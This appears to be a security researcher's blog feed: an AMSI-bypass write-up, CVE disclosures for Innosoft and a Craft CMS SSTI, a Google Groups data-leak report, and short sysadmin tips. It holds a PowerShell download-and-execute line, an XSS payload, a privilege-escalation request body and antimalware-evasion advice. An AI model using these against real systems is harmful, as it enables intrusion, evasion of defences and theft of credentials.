Weaponizing AMSI bypass with PowerShell

Introduction

The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows applications and services to integrate with any antimalware product that’s present on a machine. You can find more information on it here: https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal.

A while ago a colleague told me about an engagement in which he was running into a scenario where AMSI was unfortunately blocking his somewhat malicious PowerShell code. Due to several constrains it turned out that a lot of the known AMSI bypass techniques where not feasible for the given scenario. So I decided to do some researching on AMSI and known ways of bypassing it. Long story short: there are multiple publicly known approaches on bypassing AMSI (like Component Object Model (COM) Hijacking).  However for my specific scenario I ended up weaponizing a nifty bypass technique in PowerShell which is based on a great approach documented by Cyberark in this blog post:

https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/

I published the implementation in my GIT (https://github.com/0xB455/AmsiBypass) back then, but unfortunately didn’t find the time to document it here as well. After attending the “Windows PowerShell for Security Professionals” training held by @carlos_perez and @curi0usjack during this years Troopers conference, I decided it was time for me to play around with some POSH stuff again and therefor I’m trying to catch up with the documentation of the bypass implementation now as well.

TL;DR

AMSI is relying on the AmsiScanBuffer function which takes the buffer to be scanned as well as the buffer length. As this stuff is running in user mode, one can control the length of the buffer and can therefor bypass the processing of the actual buffer.

Game Over. AMSI is dead.

Additional information

If you want to get a better understanding of how AMSI ticks and how to break it I can recommend the talk given by Dave Kennedy during last years Wild West Hackin’ Fest:

Weaponizing the Cyberark AMSI bypass with POSH

The general approach for applying the AMSI bypass would be compiling the C# code you can find in my GIT (https://github.com/0xB455/AmsiBypass) to a managed DLL and loading it to the PowerShell console via [System.Reflection.Assembly]::LoadFile().

Here is how the patch from my implementation looks in action:

AMSI bypass screenshot

Screenshot of PowerShell running the AMSI bypass

However from an attackers point of view this would be undesirable, as one would be required to loudly drop a DLL on the target system. Part of my job involves working on IT forensic projects from time to time and I’ve seen many cases where attackers actually unnecessarily dropped DLLs on their targets leaving avoidable traces. Even though they were clearly trying to follow OPSEC. Even though it might be relevant for an attacker in order to perform DLL Side-Loading attacks, touching the disk should be a no-no if one does not want blue teams/IT forensic teams to easily resume tracks. Luckily with Powershell one can also reflect and assemble a DLL in-memory during runtime, which would be a proper way to execute our AMSI bypass.

So first of all we will take our compiled bypass DLL and encode it to base64:

Afterwards we will reflect and execute it during runtime:

That’s all we need, isn’t it? Well, there is a catch. AMSI is facilitating string based detection and it is likely that certain patterns of the base64 string might end up being blacklisted (e.g. after publicly posting it on your blog 🤔). During my research I stumbled upon Andre Marques‘ (@_zc00l) blog and noticed that he followed a similar approach. Also part of his base64 string was blacklisted a while after he publicly posted it online. So one great way of avoiding this, is by reflecting the DLL as a byte array in the integer format: 

It is very unlikely that the people working on AMSI are going to add sequences of integers to their string based blacklist, as this would generate a lot of false positives with legitimate scripts. However if they do so, there are still other ways around it like XORing the stuff with a sequence key, scrambling up the int sequence etc.

In order to build the int byte array representation, I used the following POSH snippet and pasted the output into my script – I’m pretty sure that there are smarter ways of doing this:

Byte Array as Int

Byte Array as Int

Stitching it all together

In the scenario given by my colleague it was required to:

  • pull-in and execute the PowerShell code remotely via IEX(new-object net.webclient).downloadstring(‘https://remote.host/posh’);
  • execute everything directly in memory while not touching the disk

I ended up splitting the execution into two phases.

  • Phase 1: bypass AMSI
  • Phase 2: execute dark magic

Also I found myself required to insert a Start-Sleep statement in order to assure that the malicious code is being executed after the in-memory patching was properly applied. Chaining multiple IEX directly into one another will be processed directly and any bad stuff will still be caught by AMSI.

So here is the code snippet which is called via IEX(new-object net.webclient).downloadstring(‘https://remote.host/phase1’);  for executing the bypass and then pulling the final code:

Recommendations

So as AMSI is clearly dead by design, what is left do for the blue team? Basically you won’t be able to stop this kind of bypass. I recommend to put your energy into implementing more transparency by proper logging of script blocks and alerting of unusual code statements being run on your systems. Watch out for anomalies and alert on them. For instance [Reflection.Assembly] is something that most PowerShell scripts won’t be executing on a daily basis in your environment, right? If so, you might have interesting PowerShell use-cases or eventually a security problem 😉

Posted in Researching, Windows, Write-Up | Tagged , , , , , | Comments Off on Weaponizing AMSI bypass with PowerShell

CVE-2019-15305 – CVE-2019-15309 Several Security Vulnerabilities in “Innosoft Einsatzplanung Web” Version 5.2q4

During a security assessment several security vulnerabilities were discovered by my colleagues Florian Moll and Nico Jansen in the Innosoft Einsatzplanung Web Software in Version 5.2q4. The vendor was informed about the existence of the vulnerabilities in May 2019. This blog article describes the discovered vulnerabilities in detail.

Stored Cross Site Scripting

Authenticated users are allowed to modify their username. The username is displayed on the webpage. By setting JavaScript-Code as part of the username, the Code will be executed in the user’s web browser as soon as he/she logs in again. The function is reachable via the /innosoft/UserSettings/Save URL. The affected parameter is called “FullName”. The following snippet contains a JSON-Object including the payload.

(…)  “GeneralSettings”:{

“FullName”:”<script>alert(“XSS”)</script>”,

(…)

Privilege Escalation / Insecure Permissions

Low privileged, authenticated users are able to gain administrative access. This is possible by updating the user profile. This means the vulnerability is also contained in the /innosoft/UserSettings/Save URL. The “Privfa” parameter contains permission flags, which can be modified by the logged in user. By changing those values, administrative access can be obtained, for example by sending the following JSON-Object:

(…)  {  “Code”: 0,  “Message”: null,  “Data”: { 

“User”: { (…)

“Privfa”: “111111111111111111111111111000”, 

(…)

Broken Access Control

Authenticated and non-administrative users are able to view and edit personal information of different users. By calling the URL /innosoft/UserSettings/Get/?id=[Username] it is possible to view other users profiles. Also included in this information is the password, which was secured with a rotational cipher algorithm which is easy reversible (see Usage of insecure encryption algorithms). This allows any authenticated user to view the clear-text password of any other user, including administrators. User information is returned as JSON in the following format.

{“Code”:0, “Message”:null,”Data”: {

“User” : {

        “Name” : “[Username]”,

        “Passwort” : “[Password]”,

        “Name2” : “[Username]”,

        “Sprache” : 1, 

(…)

In addition non-administrative, authenticated users are able to modify the profile of any other user. This also includes changing other user’s passwords. This is again possible by modifying the profile change request before sending it to the server. Again, the modified data can be posted to the URL /innosoft/UserSettings/Save. The following snipped contains a sample payload in JSON format.

{   “Code”: 0,  “Message”: null,  “Data”: {

“User”: {

        “Name” : “[Username to overwrite]”,

        “Passwort” : “[ 

(…)

Usage of insecure encryption algorithms

The passwords of all users are stored in the database after encrypting them using a modified rotational cipher which works as follows: An offset is initialized as 1 and increased for each letter in the password. Based on the ASCII table, the letter is replaced by [letter+offset]. The letter a at the first position would for example result in b. At the second position instead, it would result in c. If the new char is out of a specific range, it will wrap around and result in the letter after wrapping.

This algorithm is cryptographically insecure and allows the calculation of the clear-text password within milliseconds. In addition it’s easy to generate a collision (2 passwords are matching the same “hash”). For example, it’s possible to set a user’s password to “/” and login successfully using the password “z”.

Security Misconfiguration

The maximal allowed password length is limited to only 8 chars. In addition, there is no password complexity policy enforced. As a result, it’s possible to set passwords of one letter in length. Even if a secure hash algorithm like SHA256 would be used, there passwords would be simply brute-force-able due to its low complexity.

Timeline

  • <2019-05: Vulnerabilities were discovered
  • 2019-05-17: Innosoft was informed about the vulnerabilities
  • 2019-08-06: Innosoft confirmed vulnerabilities and fixed them in next release.
  • • CVE-IDs (CVE-2019-15305 – CVE-2019-15309) were assigned
  • XXXXXXXX: Public disclosure
Posted in General Stuff | Comments Off on CVE-2019-15305 – CVE-2019-15309 Several Security Vulnerabilities in “Innosoft Einsatzplanung Web” Version 5.2q4

Exploitation of Server Side Template Injection with Craft CMS plugin SEOmatic <=3.1.3 [CVE-2018-14716]

During a recent webapplication testing I decided to perform some fuzzing of certain paths within the URI of a CMS and happened to find a potential SSTI (server side template injection) within one of the CMS’ plugins which I then was able to successfully exploit for information disclosure. In this post I want to share my approach on how I moved forward with the analysis.

Introduction

So here is the SSTI which I stumbled upon during my initial fuzzing. You can see that I was able to trigger some kind of math logic which is processed by the template engine on the server which is then reflected in the canonicalURL which is part of the Link header within the response:

Initial injection point

Initial injection point

First of all: what is it about? Basically SSTI is a scenario where user input is unsafely embedded into a template. Most of the time it is related to issues where user defined input is directly concatenated into the template and if this input contained a template expression that will be evaluated by the server.

However if this type of vulnerability is new to you, make sure to visit the Portswigger blog and read this article by James Kettle (@albinowax). You won’t regret it and it is a super addition to the topic of webapplication security. His research is also available as a printable whitepaper and was presented at BlackHat 2015 (paper/video). I already was aware of the basic concept behind this vulnerability but for me this was the first time that I actually encountered it out in the wild and so I decided to freshen up my knowledge and read through James’ paper regarding the topic.

After sharpening my understanding for this kind of weakness I got eager to perform a proper exploit and my first approach was to take the easy route by leveraging an automated exploitation tool called TPLMAP (https://github.com/epinna/tplmap). (Un)fortunately my braindead fire and forget methodology was not successful and I was forced to properly look into the subject which allowed me to actually learn a few new things:

TPLMAP failing

TPLMAP failing

Back to the drawing-board

Okay, we just hit the script kiddy wall. Let me take you on the journey on how to proceed from here. First of all: let’s step back, take a breathe and evaluate the situation by breaking down the informational facts.

We definitely know that we can inject arbitrary stuff which is processed by the template engine and based on the response given in the header we can assume the site is running on Craft CMS (https://craftcms.com):

Header Responses

Header Responses

Unfortunately it does not leak the exact version number but for beginners we can simply try to leverage the latest documentation and according to this documentation Craft is using Twig (which is one of the PHP template engines covered in James’ research).

So let’s have a comprehensive look at the documentation; this will actually help us a lot with our ambitions and sharpen our understanding of how the CMS and the template engine interact with each other. Also it is super useful for understanding the architecture and the actual objects, methods and syntax of both components:

Also it is always recommended to check older/known/existing vulnerabilities for your target. And if available evaluate the code to understand what was changed and fixed during the consecutive releases. Any of this might spark some ideas in your head. In my case there were a few known issues which I reviewed. For example:

As mentioned understanding older vulnerabilities can always be a good addition towards ones very own approach. Even though the issue is already fixed, the formerly present SSTI vulnerability listed above is a good example as you can find some interesting ideas by reading up how they created the PoC for this vulnerability.

And finally if this is an option: download the source code and have a look at the internals!

If you tried leveraging automatic exploitation and reconnaissance tools (TPLMAP) make sure to understand what they do and how they do it.

Fun fact: the utilization of Twig within Craft CMS also explained why my attempt with TPLMAP did not deliver any loot in the first place, as Twig is not supported by the tool:

TPLMAP Support

TPLMAP Support

Based upon our informational ramp up we can tell that according to James’ research Twig’s _self object and its env attribute are the way to go in order to get Remote-Code-Execution (RCE):

So let us try to call it via the injection point. In my case I found that _self is not an object but merely a string returning the template’s name:

_self as string, not a referenceable object

_self as string, not a referenceable object

According to the documentation and other statements, it turns out they changed that moving from Twig v1 towards Twig v2. So we are dealing with an updated Twig version that is not prone to the vulnerabilities disclosed in James’ research. At the current point in time it seems there is no publicly available exploit alternative for Twig v2 (which also should be the reason that TPLMAP currently does not support Twig exploitation).

Well, so no easy-peasy exploitation for us.

But… there is still hope.

Getting creative

Even though there is currently no well documented way of exploiting the Twig v2 template engine, we can still try our best to interact with the components of the CMS via the identified injection point. According to the Craft CMS documentation there are plenty of interesting objects, filters and methods which can be called from the template. Also it seems that we can call objects and methods from the Craft CMS itself. According to the documentation we should be able to query the editable sections:

sample method from the documentation

sample method from the documentation

So let’s give it a try…

Reading out editable sections

Reading out editable sections

Fancy! We got an array back, so our stuff seems to be working. Let’s hunt something more juicy now. Digging through the documentation reveals one specific method that seems very promising as it allows us to read information from the configuration files (this is also what some people used to exploit Craft CMS with former vulnerabilities):

So let’s have a look at the configuration files and pick out something nice:

content from db.php

content from db.php

Plenty of juicy stuff which we can try to access, but this time we need to pass some parameters to the craft.config.get() method. Let’s try for the password entry within the db.php file:

encoded control characters

encoded control characters

(Un)fortunately the framework is shipped with some protection features which sanitize control characters by replacing them with corresponding HTML entities. When stumbling into such issues it is usually a good approach to perform some evasive maneuvers. For instance sometimes you get lucky by evaluating exotic character escape sequences or exotic encoding schemes which might bypass the filter. After spending some time with analyzing the filter behavior I came to the conclusion that it was quite robust and so a change of strategy was required. As I went back to reading the Craft documentation I started playing around with all of the available functions. The craft.request set looked quite interesting to me and while reading about the supported methods I finally stumbled upon this precious gem:

getUserAgent

getUserAgent

A quick test shows that this function indeed is reflecting the value of the client’s User-Agent header. As you can see the output is again sanitized with HTML entities:

craft.request.getUserAgent()

craft.request.getUserAgent()

In order to pass the return value on to another method we now simply need to use Twig’s set (https://twig.symfony.com/doc/2.x/tags/set.html) call and store the result in a new variable:

working with variables in Twig

working with variables in Twig

This allows us to store and reflect functions in a more flexible way. As we need to store two parameter values within our User-Agent string, we need to either use a second method as a springboard or we can use Twig’s filters in order to perform some string manipulation.
In this case I am utilizing slice() (https://twig.symfony.com/doc/2.x/filters/slice.html) which will allow us to combine multiple values within our User-Agent header.

Putting it all together

So far we have learned quite some stuff about the CMS and the template engine in scope. Based upon our knowledge we now can properly try to access sensitive information on our target by calling methods while passing on arbitrary variable values. The syntax should look something like this:

Let’s give it a try and extract the database password from the config file of our target:

extracting the DB password

extracting the DB password

At the current point we have access to a broad variety of methods. For instance we can iterate through all CMS users, take their email addresses and let them know that their site requires a security fix:

Here are some samples which I found to be of interest:

extracted loot

extracted loot

Conclusion

It turns out that the issue was caused by a CMS plugin called SEOmatic which you can find out more about here: https://straightupcraft.com/craft-plugins/seomatic and here: https://github.com/nystudio107/craft-seomatic

According to the developer the attack only works for URLs that are not associated with a corresponding Entry in Craft CMS. The reason is that the default setting for the canonicalUrl field was the Twig code:

The way SEOmatic works, the global settings are a fallback only if nothing else matches. Most pages will match an entry, category, or product of some kind of other, and in those cases, the canonicalUrl would not be set to the offending Twig code, so the exploit wouldn’t work.

So you’d need to be attacking a URL that both exists as a Twig template (so it don’t throw a 404) and then also does not have an entry, category, or product associated with it.

I am happy to confirm that the developer fixed the issue right after the issue got reported. You can find the fixed version at: https://github.com/nystudio107/craft-seomatic/releases/tag/3.1.4

And here is the commit fixing the issue: https://github.com/nystudio107/craft-seomatic/commit/1e7d1d084ac3a89e7ec70620f2749110508d1ce1

Evaluation of impact:

As we life in a beautiful Information Age it is now time to determine how many publicly on the internet available instances of Craft CMS may be impacted by the vulnerability. Let’s pull and evaluate some data from Shodan.io (side note: some people asked me how I found their website in the first place, this is how):

collecting data from Shodan

collected data from Shodan

In order to be able to process the information further I will split this up into multiple files which are grouped by port numbers:

grouping the data by port numbers

grouping the data by port numbers

Unfortunately we are only able to query the Shodan API for string values which are contained within the data sections of the information that was collected by Shodan. So I want to make sure that I am filtering for entries which actually have a proper Link header included and therefor might be affected by the vulnerability:

Sanitizing the shodan data

Sanitizing the shodan data

So 244 our of 269 left. Time for the final shot: let’s crawl the remaining targets and see what’s left:

vulnerable hosts

vulnerable hosts

Overall I identified 65 vulnerable targets which could have been worse. Then I simply dumped the email addresses of ~300 admin accounts and let them know of the problem. A bunch of them quickly returned to me and acknowledged that they have updated their installation properly. As the developer also pointed the matter out on Twitter most people should be running on a fixed version soon:

https://twitter.com/nystudio107/status/1021847835418009605

Final words:

Leveraging existing scanning and exploitation tools is always easy. But once you hit a wall spend some time with sharpening the axe before cutting down the tree. Make sure to identify and process comprehensive information in order to to get a better understanding of your target. It will pay off in the end. At the very least you will have learned something new.

Timeline:

  • 2018-07-19: Discovered
  • 2018-07-23: Vendor notified
  • 2018-07-24: Version 3.1.4 released, issue resolved
  • 2018-07-29: CVE-2018-14716 assigned
  • 2018-07-30: public disclosure
  • 2018-07-31: PoC added to Exploit-DB
Posted in Researching, Webapplication security, Write-Up | Tagged , , , , , , , , , , , , , | Comments Off on Exploitation of Server Side Template Injection with Craft CMS plugin SEOmatic <=3.1.3 [CVE-2018-14716]

Comprehensive data leakage via Google Groups

So, a few days ago Brian Krebs posted an article on his blog called “Are Your Google Groups Leaking Data?“. This article reached me while I was chilling in the sun but it did not really suprise me as I was researching on the very same topic right before going on my vacation. Actually I wanted to release this information a few weeks ago but mutually agreed with the guys from Google to wait for it until we had a chance for a direct talk which was scheduled right after my vacation (a.k.a today).

At the current point in time there is not much left to be added as you can find most of the interesting information already published in the article from the researchers at Kenna Security and in Brian’s write-up (or you can have a look in the original advisory from Redlock which is even dating back to July 2017). However as I already had my stuff written up I wanted to get it out as well. At the very least it may help to spread out the word and make sure that affected Google customers remediate the issue.

For me it all started a few weeks ago with a colleague pointing me out to a post by @JGamblin on Twitter:

As I am currently working with different organizations which are using the G Suite on a corporate level I wanted to have a closer look at the matter and was shocked with the results. As luck would have it we had a representative from Google Cloud’s Professional Service at our office so that I could share my results with him directly. He was quite concerned with the matter and decided to hook me up with the PO for Google Groups directly. As I was about to hit my vacation I promised to deliver a quick write-up concerning my obervations and we scheduled a phone call and a disclosure for when I would return.

As I was sitting on a big pile of juicy loot I decided to contact some of the affected organizations manually but quickly realized that it was too much effort for me to contact all of them. As I was confident that the information would get into more and more hands I wanted to bring the topic up to Google before disclosing the issue further. At the very least the articles mentioned above proofed me right on this…

So, today I finally had the chance to talk with Google and offered them my point of view on the matter. Overall it was a quite constructive chat and they assured me that they have taken actions in order to directly contact and inform their customers who might be affected by the issue. Right now I can confirm that only a small subset of the affected customers have fixed this.

During our talk Google agreed on my point of view that the overall presentation of privacy implications within the web-frontend is not very clean. Given that, they also confirmed that right now they are evaluating howto improve the visual representation. So expect a blinking 90’s gif, marquee text and an alarm sound soon!

   

We also discussed some other ways they had in mind of how the overall security / privacy controlls of the solution could be enhanced. As most of the stuff would require larger changes on the overall architecture, I personally feel it is unlikely they are going into this direction any time soon.

Well, all that is left for me to do now, is to once again appeal to G Suite administrators to check their privacy configurations and make sure to have a look at Google’s recommendations, as well as to pay attention to the article published by Kenna Security. They did a good job in describing the overall problem, the potential impact as well as the mitigation process. So I will not pickup those topics here. If you want to get in touch with me, feel free to hit me up on Twitter @0xB455

TL;DR

If you are using Google Groups and your domain is configured to “Public to the internet” you should audit the visibility of each Group. Even though you believe that your sensitive groups are properly protected (as they might not be listed in your public directory index), they still might be publicly accessible without any authentication. Currently multiple thousand domains are affected…

So without further ado: here is the little write-up from May which I supplied to Google (featuring fancy lolcat output – simply because it rulez):

 

=== BOF ===

Get the party started

Hi folks, as described earlier today the original root cause for my investigation was the fact that we came across an issue where it was possible to publicly access confidential content within Google Groups without being authenticated within our domain. We raised the issue with our internal G Suite admins and they jumped on having a look at the privacy settings for our domain.

After sprinkling some magic dust they replied back to me that they applied proper changes towards the privacy configurations within our domain.

So I had another look and noted that our admins applied changes towards the visibility of groups within the index directory for our Google Groups domain. Seemed good to me as it was no longer readable without a proper authentication. This was accomplished by revoking the listing option from each group.

However I found that it was still possible to publicly access confidential content by either having direct links towards the individual groups or by simply utilizing the search functionality.

I immediately replied back to our admins and we had a more detailed look at the privacy settings again. After some digging through the permission settings we finally were able to determine that some users accidentally configured the permissions for their groups by selecting the option “All organization members”.

As we were running our domain with the “Public on the Internet” permission, this ultimately resulted in the fact that unauthenticated users are capable to access the misconfigured groups:

Also consider a scenario where users within a private Google Groups domain are getting used to apply the “all organization members” option to their groups. Later on in time the “Outside this domain – access to groups” configuration gets switched to “Public on the Internet” without anyone noticing that individual groups are now being exposed towards the public.

 

Eventually we ended up with a very bad feeling in our stomach and I asked our admins to switch the domain to complete private mode. We will now reconsider our use-cases related to the G Suite products and perform proper risk assessments for them.

 

Seems shady

Okay let’s have a detailed breakdown what went wrong here.

  1. we are visiting a publicly accessible domain within Google Groups
  2. we are validating which groups are listed within the domain
  3. we are trying to access groups with juicy names and descriptions; no luck… sadface!
  4. we search for sensitive content within the group; no luck again… sadface!
  5. we search for sensitive content within the whole domain; et voilà!

    data anonymized for public disclosure

  6. we visit the unlisted group and have a look around …

    data anonymized for public disclosure

  7. … and get our hands on some nice information … profit!

    data anonymized for public disclosure

 

What could possibly go wrong? ¯\_(ツ)_/¯

As I was pretty sure that we were not the only people on the planet running into those unwanted configurations I decided to perform an evaluation of the Alexa top 1 million popular websites. Therefor a colleague and I quickly hacked up a crawler with some python code and within several hours the tool was able to identify about ~6.000 valid domains of Google G Suite customers which were generally running their Google Groups in public mode:

Next up I decided to have a closer look and fired up some sample queries within the individual domains in order to identify Google customers who unintentionally misconfigured their privacy settings in a similar manner as we did it before. Basically I was utilizing some search patterns in order to identify unlisted groups and later on validated which of those were not explicitly included within the overall index (therefore likely to be of a confidential nature).

I was still thinking about the implication of my findings and decided to do some data mining within those groups, trying to evaluate the possibilities of actually gaining access to confidential and sensitive content. Soon after performing some very basic reconnaissance I was sitting on all kinds of sensitive data of Google customers… PayPal accounts which had larger balances waiting to be withdrawn, private keys and certificates used for trusted communication, credentials for web-services or cloud/network infrastructure, confidential employee information, all sorts of financial information and last but not least a lot of GDPR relevant personal data from end customers and private persons…

From the ~6.000 domains nearly 30% (~1800 domains) were actually leaking sensitive data. As a PoC here is an extract showing some of the loot which I was able to identify, feel free to check up the links for yourself:

data anonymized for public disclosure

Please consider that we are barely talking about around 6.000 potential targets that I identified by using a common domain list. The real footprint of affected domains and customers would be somewhat higher then what is included within the Alexa toplist. A malicious and determined threat actor aiming for exploiting the issue in a larger scale will likely hit more domains then the ones I hastily evaluated with the crawler. I am confident that we can extrapolate this number into at least a few thousand additional domains.

 

Room for improvement

So here is what I recommend in order to mitigate the issue.

First of all: let your affected customers know that they might have a problem with their data being publicly exposed.

As a second: I believe that Google should improve the user interface for their customers and get rid of misleading or intransparent aspects within the UI. Whenever someone is about to set a privacy setting which could lead to complete public exposure there should be a proper warning presented. Basically: whenever users are in danger of exposing content from their domain towards the public internet Google should turn on the red lights and an alarm signal…

Currently the assets for managing the G Suite on a larger scale are limited. We found that by tinkering with tools such as Google Apps Manager (GAM) it is possible to run a batched evaluation of all objects within the G Suite domain. But implementing some kind of native audit feature within the webfrontend would be a huge benefit for administrators.

 

Conclusion

Depending on the individual scenario users and administrators of Google Groups might unknowingly run into misconfiguration of their privacy settings. This can result in data leaks. For companies whose organization and communication heavily rely on using Google Groups this can have a huge impact.

Digging through all the relevant privacy settings within the G Suite seems not very intuitive and can be a challenging task for admins. Cleaning up or auditing an existing and eventually misconfigured domain might be a challenging task as well. Making use of tools like the Google Apps Manager can mitigate the hassle.

I understand that the discussed issue is not relying within the core functionality of Google Groups per se and that this is no technical security issue within the product. It rather is related towards configuration errors which are unintentionally introduced by users. Handling the entangled collection of privacy controls and assessing their implications might be challenging.

I personally feel that it is Google’s duty to make their customers (admins and users) more aware of potential risks and implications regarding the individual privacy controls within the G Suite. I feel that Google needs to consider how the ramifications of those controls can be presented towards the user in a better and more transparent way.

 

=== EOF ===

Posted in General Stuff, Researching, Write-Up | Tagged , , | Comments Off on Comprehensive data leakage via Google Groups

Pingsweep with Windows CLI

I just happened to find myself with the requirement of performing a ping sweep of the local /24 network under Windows without installing any additional software or tools.

Turns out you can do that quite easily via the commandline:

 

Posted in Windows | Comments Off on Pingsweep with Windows CLI

Creating dummy files in Windows

If you want to create dummy files in Windows you can simple create them by using fsutil:

So in order to create a bulk file which is 1 GB in size you can go with:

Posted in Windows | Comments Off on Creating dummy files in Windows

Feeding content from Burpsuite into other tools e.g. sqlmap

If you ever wonder how to foward your content from Burpsuite towards any other tool you have to keep in mind that there is a logging options available.

Enable logging within burp and parse the logfile as input towards sqlmap:

 

Posted in Backtrack / Kali-Linux | Comments Off on Feeding content from Burpsuite into other tools e.g. sqlmap

Carving the filesystem for large files under linux

Find files which are greater than 20MB:

find / -size +20000k -exec du -h {} \;

Posted in Backtrack / Kali-Linux | Comments Off on Carving the filesystem for large files under linux

Carving the filesystem for recently created files in linux

Files created or modified less than 48 hours ago, sorted from the newest to the oldest:

Posted in Backtrack / Kali-Linux | Comments Off on Carving the filesystem for recently created files in linux

Copy datastreams via SSH

I just realized that one can push or pull data streams through SSH as well. Just used it with DD and it saved me a lot of time.

pushing with DD:

 

pulling with DD:

 

 

Posted in Backtrack / Kali-Linux, General Stuff | Comments Off on Copy datastreams via SSH